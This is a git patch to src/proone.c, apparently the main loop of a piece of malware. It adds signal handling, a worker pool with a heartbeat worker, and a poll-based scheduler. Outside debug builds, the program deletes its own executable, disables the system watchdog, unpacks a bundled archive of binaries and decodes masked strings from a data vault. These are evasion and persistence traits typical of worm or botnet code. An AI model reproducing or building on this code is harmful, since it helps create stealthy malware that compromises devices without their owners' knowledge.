From 85d78af0cd8b809abc28491c46c648a242053044 Mon Sep 17 00:00:00 2001 From: David Timber Date: Tue, 31 Dec 2019 02:52:35 +1100 Subject: checkpoint --- src/proone.c | 213 +++++++++++++++++++++++++++++++++++++++++++++++++++++++---- 1 file changed, 200 insertions(+), 13 deletions(-) (limited to 'src/proone.c') diff --git a/src/proone.c b/src/proone.c index 3cfd809..5e2d672 100644 --- a/src/proone.c +++ b/src/proone.c @@ -1,8 +1,3 @@ -#define _GNU_SOURCE -#include "proone.h" -#include "proone_util.h" -#include "proone_dvault.h" - #include #include #include @@ -14,13 +9,36 @@ #include #include #include +#include #include #include #include #include +#include "proone.h" +#include "proone_util.h" +#include "proone_dvault.h" +#include "proone_heartbeat-worker.h" + + +struct proone_global pne_global; -proone_global_t pne_global; + +typedef struct { + proone_worker_t worker; + proone_worker_sched_req_t sched_req; +} worker_tuple_t; + +typedef struct { + struct pollfd *arr; + size_t size; +} pollfd_pool_t; + +static worker_tuple_t worker_pool[1]; +static size_t worker_pool_size = 0; +static void (*proc_fin_call_ptr)(void) = NULL; +static bool finalising = false; +static pollfd_pool_t pollfd_pool; static bool ensure_single_instance (void) { @@ -111,23 +129,48 @@ static void disasble_watchdog (void) { } } +static void handle_interrupt (const int sig) { + if (pne_global.caught_signal == 0) { + pne_global.caught_signal = sig; + } + signal(sig, SIG_DFL); +} + +static void proc_fin_call (void) { + if (pne_global.caught_signal != 0) { + size_t i; + worker_tuple_t *wt; + + for (i = 0; i < worker_pool_size; i += 1) { + wt = worker_pool + i; + wt->worker.fin(wt->worker.ctx); + } + + proc_fin_call_ptr = proone_empty_func; + finalising = true; + } +} + int main (const int argc, char **args) { int exit_code = 0; - bool main_loop_flag = true; + size_t i; + worker_tuple_t *wt; + proone_worker_sched_info_t sched_info; pne_global.has_proc_lim_lock = false; pne_global.bin_ready = false; + pne_global.caught_signal = 0; + pne_global.rnd = NULL; proone_init_unpack_bin_archive_result(&pne_global.bin_pack); proone_init_bin_archive(&pne_global.bin_archive); /* quick prep. IN THIS ORDER! */ + proone_init_dvault(); +#ifndef DEBUG delete_myself(args[0]); - if (!ensure_single_instance()) { - exit_code = 1; - goto END; - } disasble_watchdog(); +#endif init_rnd_engine(); // get fed with the bin archive @@ -144,15 +187,159 @@ int main (const int argc, char **args) { close(STDERR_FILENO); errno = 0; - do { + // install signal handlers + // try to exit gracefully upon reception of these signals + signal(SIGINT, handle_interrupt); + signal(SIGTERM, handle_interrupt); +#ifndef DEBUG + signal(SIGPIPE, SIG_IGN); +#endif + + if (!ensure_single_instance()) { + exit_code = 1; + goto END; + } + + // init workers + if (proone_alloc_heartbeat_worker(&worker_pool[worker_pool_size].worker)) { + worker_pool_size += 1; + } + + // TODO + + for (i = 0; i < worker_pool_size; i += 1) { + proone_init_worker_sched_req(&worker_pool[i].sched_req, NULL); + } + + if (worker_pool_size == 0 || pne_global.caught_signal != 0) { + goto END; + } + + proc_fin_call_ptr = proc_fin_call; + + proone_succeed_or_die(clock_gettime(CLOCK_MONOTONIC, &sched_info.last_tick)); + pollfd_pool.arr = NULL; + pollfd_pool.size = 0; + while (true) { + proone_worker_sched_flag_t all_sched_flag = PROONE_WORKER_SCHED_FLAG_NONE; + struct timespec timeout; + size_t total_pollfd_size = 0; + bool worked = false; + + proone_succeed_or_die(clock_gettime(CLOCK_MONOTONIC, &sched_info.this_tick)); + sched_info.tick_diff = proone_sub_timespec(&sched_info.this_tick, &sched_info.last_tick); + sched_info.real_tick_diff = proone_real_timespec(&sched_info.tick_diff); + + proc_fin_call_ptr(); - } while (main_loop_flag); + for (i = 0; i < worker_pool_size; i += 1) { + wt = worker_pool + i; + + if (wt->worker.has_finalised(wt->worker.ctx)) { + continue; + } + + wt->worker.work(wt->worker.ctx, &sched_info, &wt->sched_req); + worked |= true; + + if (wt->sched_req.flags & PROONE_WORKER_SCHED_FLAG_TIMEOUT) { + if (all_sched_flag & PROONE_WORKER_SCHED_FLAG_TIMEOUT) { + if (proone_cmp_timespec(&timeout, &wt->sched_req.timeout) > 0) { + timeout = wt->sched_req.timeout; + } + } + else { + timeout = wt->sched_req.timeout; + } + } + if (wt->sched_req.flags & PROONE_WORKER_SCHED_FLAG_POLL) { + total_pollfd_size += wt->sched_req.pollfd_arr_size; + } + + all_sched_flag |= wt->sched_req.flags; + } + + sched_info.last_tick = sched_info.this_tick; + + if (!worked) { + if (!finalising) { + exit_code = 1; + } + break; + } + else if (all_sched_flag & PROONE_WORKER_SCHED_FLAG_POLL) { + void *ny_mem; + size_t pollfd_ptr; + + ny_mem = realloc(pollfd_pool.arr, total_pollfd_size * sizeof(struct pollfd)); + if (ny_mem != NULL) { + pollfd_pool.arr = (struct pollfd*)ny_mem; + pollfd_pool.size = total_pollfd_size; + + pollfd_ptr = 0; + for (i = 0; i < worker_pool_size; i += 1) { + wt = &worker_pool[i]; + if (wt->sched_req.flags & PROONE_WORKER_SCHED_FLAG_POLL) { + wt->sched_req.pollfd_ready = false; + memcpy(pollfd_pool.arr + pollfd_ptr, wt->sched_req.pollfd_arr, wt->sched_req.pollfd_arr_size * sizeof(struct pollfd)); + pollfd_ptr += wt->sched_req.pollfd_arr_size; + } + } + + if (ppoll(pollfd_pool.arr, pollfd_pool.size, all_sched_flag & PROONE_WORKER_SCHED_FLAG_TIMEOUT ? &timeout : NULL, NULL) < 0) { + switch (errno) { + case EINTR: + case ENOMEM: + break; + default: + abort(); + } + } + else { + pollfd_ptr = 0; + for (i = 0; i < worker_pool_size; i += 1) { + wt = &worker_pool[i]; + if (wt->sched_req.flags & PROONE_WORKER_SCHED_FLAG_POLL) { + wt->sched_req.pollfd_ready = true; + memcpy(wt->sched_req.pollfd_arr, pollfd_pool.arr + pollfd_ptr, wt->sched_req.pollfd_arr_size); + pollfd_ptr += wt->sched_req.pollfd_arr_size; + } + } + } + } + } + else if (all_sched_flag & PROONE_WORKER_SCHED_FLAG_TIMEOUT) { + if (nanosleep(&timeout, NULL) < 0 && errno != EINTR) { + abort(); + } + } + } END: + free(pollfd_pool.arr); + pollfd_pool.arr = NULL; + pollfd_pool.size = 0; + + for (i = 0; i < worker_pool_size; i += 1) { + wt = &worker_pool[i]; + wt->worker.free(wt->worker.ctx); + wt->sched_req.mem_func.free(&wt->sched_req); + } + if (pne_global.has_proc_lim_lock) { shm_unlink(proone_dvault_unmask_entry_cstr(PROONE_DATA_KEY_PROC_LIM_SHM)); proone_dvault_reset_dict(); + pne_global.has_proc_lim_lock = false; } + proone_free_bin_archive(&pne_global.bin_archive); + proone_free_unpack_bin_archive_result(&pne_global.bin_pack); + pne_global.bin_ready = false; + + proone_free_rnd_engine(pne_global.rnd); + pne_global.rnd = NULL; + + proone_deinit_dvault(); + return exit_code; } -- cgit